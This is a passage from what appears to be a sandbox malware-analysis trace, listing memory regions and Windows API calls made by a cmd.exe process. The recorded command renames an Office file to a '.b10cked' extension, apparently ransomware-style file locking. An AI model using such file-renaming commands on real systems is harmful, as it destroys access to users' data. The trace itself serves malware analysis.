"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21858 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 21859 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 21860 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21861 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21862 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21863 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21864 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21865 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21866 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21867 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21868 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21869 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 21870 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21871 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21872 start_va = 0x2a0000 end_va = 0x2a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21873 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21874 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 21875 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 21876 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 21877 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 21878 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name 
= "pagefile_0x0000000001190000" filename = "" Thread: id = 329 os_tid = 0xe9c [0158.472] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfe1c | out: lpSystemTimeAsFileTime=0x1cfe1c*(dwLowDateTime=0x98630580, dwHighDateTime=0x1d440a9)) [0158.472] GetCurrentProcessId () returned 0xf5c [0158.473] GetCurrentThreadId () returned 0xe9c [0158.473] GetTickCount () returned 0x307ec [0158.473] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfe14 | out: lpPerformanceCount=0x1cfe14*=21526177778) returned 1 [0158.473] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0158.473] __set_app_type (_Type=0x1) [0158.473] __p__fmode () returned 0x76b331f4 [0158.473] __p__commode () returned 0x76b331fc [0158.473] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0158.473] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0158.474] GetCurrentThreadId () returned 0xe9c [0158.474] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe9c) returned 0x38 [0158.474] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.474] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0158.474] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.475] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.475] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfdac | out: phkResult=0x1cfdac*=0x0) returned 0x2 [0158.475] VirtualQuery (in: lpAddress=0x1cfde3, lpBuffer=0x1cfd7c, dwLength=0x1c | out: lpBuffer=0x1cfd7c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.475] VirtualQuery (in: 
lpAddress=0xd0000, lpBuffer=0x1cfd7c, dwLength=0x1c | out: lpBuffer=0x1cfd7c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0158.475] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfd7c, dwLength=0x1c | out: lpBuffer=0x1cfd7c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0158.475] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfd7c, dwLength=0x1c | out: lpBuffer=0x1cfd7c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.475] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfd7c, dwLength=0x1c | out: lpBuffer=0x1cfd7c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0158.475] GetConsoleOutputCP () returned 0x1b5 [0158.475] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.475] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0158.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.475] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0158.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.475] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.476] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.476] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.476] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.476] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.476] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0158.476] GetEnvironmentStringsW () returned 0x390218* [0158.476] FreeEnvironmentStringsW 
(penv=0x390218) returned 1 [0158.476] GetEnvironmentStringsW () returned 0x390218* [0158.476] FreeEnvironmentStringsW (penv=0x390218) returned 1 [0158.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ced1c | out: phkResult=0x1ced1c*=0x40) returned 0x0 [0158.476] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0xa8, lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x1, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0x1, lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x0, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x40, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x40, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0x40, 
lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegCloseKey (hKey=0x40) returned 0x0 [0158.477] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ced1c | out: phkResult=0x1ced1c*=0x40) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0x40, lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x1, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0x1, lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x0, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x9, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x4, lpData=0x1ced28*=0x9, lpcbData=0x1ced20*=0x4) returned 0x0 [0158.477] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ced24, lpData=0x1ced28, lpcbData=0x1ced20*=0x1000 | out: lpType=0x1ced24*=0x0, lpData=0x1ced28*=0x9, lpcbData=0x1ced20*=0x1000) returned 0x2 [0158.477] RegCloseKey (hKey=0x40) 
returned 0x0 [0158.477] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886381 [0158.477] srand (_Seed=0x5b886381) [0158.477] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked\"" [0158.477] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked\"" [0158.477] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.478] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x391978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0158.478] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0158.478] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0158.478] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.478] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0158.478] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0158.478] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0158.478] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0158.478] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0158.478] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0158.478] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0158.478] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0158.478] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0158.478] GetEnvironmentStringsW () returned 0x392368* [0158.478] FreeEnvironmentStringsW (penv=0x392368) returned 1 [0158.478] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.478] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.478] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0158.479] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0158.479] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0158.479] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0158.479] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0158.479] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0158.479] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0158.479] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0158.479] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfae8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.479] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfae8, lpFilePart=0x1cfae4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cfae4*="Desktop") returned 0x18 [0158.479] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.479] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf864 | out: lpFindFileData=0x1cf864) returned 0x3909f8 [0158.479] FindClose (in: hFindFile=0x3909f8 | out: hFindFile=0x3909f8) returned 1 [0158.479] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf864 | out: lpFindFileData=0x1cf864) returned 0x3909f8 [0158.479] FindClose (in: 
hFindFile=0x3909f8 | out: hFindFile=0x3909f8) returned 1 [0158.479] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf864 | out: lpFindFileData=0x1cf864) returned 0x3909f8 [0158.479] FindClose (in: hFindFile=0x3909f8 | out: hFindFile=0x3909f8) returned 1 [0158.480] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.480] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0158.480] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0158.480] GetEnvironmentStringsW () returned 0x390218* [0158.480] FreeEnvironmentStringsW (penv=0x390218) returned 1 [0158.480] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.480] GetConsoleOutputCP () returned 0x1b5 [0158.480] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.480] GetUserDefaultLCID () returned 0x409 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfc28, cchData=128 | out: lpLCData="0") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfc28, cchData=128 | out: lpLCData="0") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfc28, cchData=128 | out: lpLCData="1") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0158.481] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0158.481] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0158.482] GetConsoleTitleW (in: lpConsoleTitle=0x380938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.482] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.482] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0158.482] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0158.482] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0158.483] _wcsicmp (_String1="move", _String2=")") returned 68 [0158.483] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0158.483] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0158.483] _wcsicmp (_String1="IF", _String2="move") returned -4 [0158.483] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0158.483] _wcsicmp (_String1="REM", _String2="move") returned 5 [0158.483] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0158.487] GetConsoleTitleW (in: lpConsoleTitle=0x1cf920, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.487] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0158.487] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0158.487] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0158.487] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0158.487] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0158.487] _wcsicmp (_String1="move", _String2="CD") returned 10 [0158.487] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0158.487] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0158.487] _wcsicmp (_String1="move", _String2="REN") returned -5 [0158.487] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0158.487] _wcsicmp (_String1="move", _String2="SET") returned -6 [0158.487] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0158.487] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0158.487] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0158.487] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0158.487] _wcsicmp (_String1="move", _String2="MD") returned 11 [0158.487] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0158.487] _wcsicmp (_String1="move", _String2="RD") returned -5 [0158.487] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0158.487] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0158.487] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0158.487] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0158.487] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0158.487] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0158.487] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0158.487] _wcsicmp (_String1="move", _String2="VER") returned -9 [0158.488] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0158.488] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0158.488] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0158.488] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0158.488] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0158.488] _wcsicmp (_String1="move", _String2="START") returned -6 [0158.488] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0158.488] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0158.488] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0158.489] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.489] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.489] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf6dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf6d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf6d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0158.490] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0158.491] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0158.491] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0158.491] _wcsicmp (_String1="PUB6IN~2.TRX", _String2=".") returned 66 [0158.491] _wcsicmp 
